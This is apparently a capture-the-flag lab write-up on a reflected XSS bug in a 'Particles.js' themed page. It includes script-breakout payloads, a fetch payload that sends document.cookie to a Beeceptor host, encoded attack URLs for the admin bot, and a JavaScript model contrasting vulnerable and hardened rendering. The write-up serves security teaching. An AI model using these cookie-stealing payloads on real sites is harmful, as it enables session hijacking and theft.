Simple Web - 0x08(Lab - `Particles.js`)


tags: CTF Web eductf

Challenge: https://particles.ctf.zoolab.org

Description

The website lets the user change the theme of the layout via a `config` parameter. The goal is to leak the admin's cookie.

Source Code

Analysis

Exploit - XSS

  1. Use Burp Suite to check whether the `config` parameter is reflected into the page unescaped, i.e. whether the site is vulnerable to XSS.
  2. Modify the `config` parameter. Its value is reflected twice, raw, inside the inline `<script>`: once in the single-quoted string `config.value = '...'` and once in the `fetch('/....json')` URL.

     Payload 1: `1;alert(123);console.log({x://\`

     The trailing `\` escapes the quote that was meant to close `config.value = '...'`, so the string literal runs on to the quote in `fetch('`; what follows is then parsed as JavaScript, `alert(123);` executes, and `console.log({x://` opens an object whose `//` comments out the rest of the line, so the page's own `})` on the last line closes it and the script still parses.

     :::spoiler Response 1
     ```html
     ...
     <script>
         url.value = location; config.value = '1;
         alert(123);
         console.log({x://\'; fetch('/1;alert(123);console.log({x://\.json').then(r => r.json()).then(json => {
             particlesJS("particles-js", json)
         })
     </script>
     ...
     ```
     :::

     Payload 2: `</script><script>alert(123);</script>`

     This one does not bother with the JavaScript string context at all: the HTML parser ends a `<script>` element at the first `</script>` regardless of where it sits in the JavaScript, so the original script becomes unparseable (and is skipped by the browser) while the injected script runs. Because the value is reflected twice, the alert fires twice.

     :::spoiler Response 2
     ```html
     ...
     <script>
     url.value = location; config.value = '
     </script>
     <script>
         alert(123);
     </script>
     '; fetch('/</script>
     <script>
         alert(123);
     </script>
     .json').then(r => r.json()).then(json => {
             particlesJS("particles-js", json)
         })
     </script>
     ...
     ```
     :::

     Payload 3: `</script><script>alert(123);</script><script>console.log({x://`

     Same effect as Payload 2; the extra `<script>console.log({x://` opens a script around the trailing `'; fetch('/` and `.json')...` fragments, so they are swallowed by a comment instead of being rendered as visible page text.

     :::spoiler Response 3
     ```html
     ...
     <script>
     url.value = location; config.value = '
     </script>
     <script>
         alert(123);
     </script>
     <script>
         console.log({x://'; fetch('/
     </script>
     <script>
         alert(123);
     </script>
     <script>
         console.log({x://.json').then(r => r.json()).then(json => {
             particlesJS("particles-js", json)
         })
     </script>
     ...
     ```
     :::

  3. Exfiltrate the cookie with `fetch` to a Beeceptor endpoint.

     Payload:
     ```
     </script><script>fetch(%22https://sbk6401.free.beeceptor.com?%22%2bdocument.cookie);</script>
     ```

     Note: `+` and `"` MUST be URL-encoded as `%2B` and `%22` respectively. A raw `+` in a query string is decoded as a space, which would break the string concatenation with `document.cookie`.

     URL:
     ```
     https://particles.ctf.zoolab.org/?config=%3C/script%3E%3Cscript%3Efetch(%22https://sbkkk.free.beeceptor.com?%22%2bdocument.cookie);%3C/script%3E
     ```

  4. Report the URL to the author (the admin bot visits it). The value submitted in the report form must itself be URL-encoded, so the payload ends up double-encoded (`%2522`, `%252b`):
     ```
     https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbkkk.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E
     ```

  • Other payloads (the `url=` form field of the report, double-encoded):

    :::spoiler payload
    Payload 2
    ```
    url=https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbk6401.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E%3Cscript%3Econsole.log%28%7Bx%3A%2F%2F
    ```

    Payload 3
    ```
    url=https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbk6401.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E
    ```
    :::
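The whole chain above (string-context breakout, `</script>` breakout, cookie exfiltration, and the single/double URL encoding of the attack URL) as a runnable model. This is an added example, not the challenge's source and not the author's code: `renderVulnerable` is a reconstruction of the template shape visible in the responses (an assumption), `renderSafe` is a hardened variant written for contrast, `simulate` executes the rendered scripts with stub `url`/`config`/`fetch`/`alert`/`document` globals, and `document.cookie` is the constructed value `flag=example`. The Beeceptor host and the challenge origin are the ones the writeup uses.

```javascript
// Added example (not the challenge's source): a model of the reflection shown in
// the responses above, a hardened renderer, and a harness that executes the
// rendered scripts with stub globals to see what really runs.

// Reconstructed shape of the vulnerable template (assumption): the parameter is
// pasted raw into a single-quoted JS string and again into the fetch URL.
function renderVulnerable(config) {
  return `<script>
    url.value = location; config.value = '${config}'; fetch('/${config}.json').then(r => r.json()).then(json => {
        particlesJS("particles-js", json)
    })
</script>`;
}

// Hardened version: JSON.stringify produces a JS string literal (quotes and
// backslashes escaped) and "<" becomes \u003c, so a "</script>" inside the value
// can no longer end the element at the HTML level; the URL part is percent-encoded.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, "\\u003c");
}

function renderSafe(config) {
  const lit = jsStringLiteral(config);
  return `<script>
    url.value = location; config.value = ${lit}; fetch('/' + encodeURIComponent(${lit}) + '.json').then(r => r.json()).then(json => {
        particlesJS("particles-js", json)
    })
</script>`;
}

// Script bodies the way the HTML tokenizer delimits them: a script element ends
// at the first "</script", whatever the JavaScript context at that point.
function scriptBodies(html) {
  const re = /<script[^>]*>([\s\S]*?)<\/script/gi;
  const bodies = [];
  for (let m; (m = re.exec(html)) !== null;) bodies.push(m[1]);
  return bodies;
}

// Execute every script block with stub DOM/network globals and record the
// observable effects. document.cookie holds a constructed value for the demo.
function simulate(html) {
  const out = { alerts: [], fetched: [], syntaxErrors: 0, configValue: undefined };
  const url = { value: "" };
  const config = { value: "" };
  const chain = { then() { return chain; } };        // inert stand-in for a Promise
  const fetch = (u) => { out.fetched.push(u); return chain; };
  const alert = (x) => { out.alerts.push(x); };
  const particlesJS = () => {};
  const document = { cookie: "flag=example" };       // constructed, not a real flag
  for (const body of scriptBodies(html)) {
    let fn;
    try {
      fn = new Function("url", "config", "fetch", "particlesJS", "alert", "location", "document", body);
    } catch (e) {
      out.syntaxErrors += 1;                           // a browser skips a block that does not parse
      continue;
    }
    try {
      fn(url, config, fetch, particlesJS, alert, "https://particles.ctf.zoolab.org/", document);
    } catch (e) {
      // runtime errors that happen after the injected code already ran (e.g. json is not defined)
    }
  }
  out.configValue = config.value;
  return out;
}

// Attack URL and report-form value. encodeURIComponent turns "+" into %2B (a raw
// "+" in a query string decodes to a space) and '"' into %22; encoding the whole
// attack URL once more gives the double-encoded form pasted into the report.
function buildAttackUrl(base, payload) {
  return `${base}/?config=${encodeURIComponent(payload)}`;
}
function buildReportValue(attackUrl) {
  return encodeURIComponent(attackUrl);
}

const PAYLOAD_STRING = "1;alert(123);console.log({x://\\";
const PAYLOAD_BREAKOUT = "</script><script>alert(123);</script>";
const PAYLOAD_EXFIL = '</script><script>fetch("https://sbk6401.free.beeceptor.com?"+document.cookie);</script>';

console.log("vulnerable, payload 1:", simulate(renderVulnerable(PAYLOAD_STRING)));
console.log("vulnerable, exfil:", simulate(renderVulnerable(PAYLOAD_EXFIL)).fetched);
console.log("hardened, exfil:", simulate(renderSafe(PAYLOAD_EXFIL)));
console.log(buildReportValue(buildAttackUrl("https://particles.ctf.zoolab.org", PAYLOAD_EXFIL)));
```

Running it shows the difference between the two breakouts: with Payload 1 the original script still parses and `alert` runs from inside it, with the `</script>` payloads the original block fails to parse and is skipped while the injected blocks run (twice, because the value is reflected twice), and with the exfil payload the stub `fetch` receives `https://sbk6401.free.beeceptor.com?flag=example`. Against `renderSafe` the same three payloads end up verbatim in `config.value`, nothing else executes, and the page keeps a single `<script>` element. `encodeURIComponent` encodes more characters than the hand-built URL in the writeup (`/`, `:`, `(`, `)` as well), which is harmless; the part that matters is that `+` and `"` never reach the query string raw.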